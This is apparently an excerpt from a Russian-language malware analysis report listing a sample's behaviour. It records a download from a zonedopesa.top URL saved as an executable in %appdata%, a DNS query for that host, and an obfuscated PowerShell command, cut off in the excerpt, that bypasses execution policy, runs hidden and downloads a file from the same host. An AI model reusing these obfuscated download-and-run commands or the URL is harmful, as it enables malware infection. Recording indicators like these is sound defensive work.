Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Power^sH^eLl^.^e^xe^ ^-e^XE^cu^TiOnPOlIcy BY^pAsS^ -^NOPr^o^FilE -^WIn^d^oWSTylE^ H^I^dde^n (NeW-oBJ^eCt^ S^YST^em.N^E^t.webcLiEN^t^)^.D^owNlo^A^D^Fil^e('http://www.zonedopesa...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "Power^sH^eLl^.^e^xe^ ^-e^XE^cu^TiOnPOlIcy BY^pAsS^ -^NOPr^o^FilE -^WIn^d^oWSTylE^ H^I^dde^n (NeW-oBJ^eCt^ S^YST^em.N^E^t.webcLiEN^t^)^.D^owNlo^A^D^Fil^e('http://www.zonedopesa...' (со скрытым окном)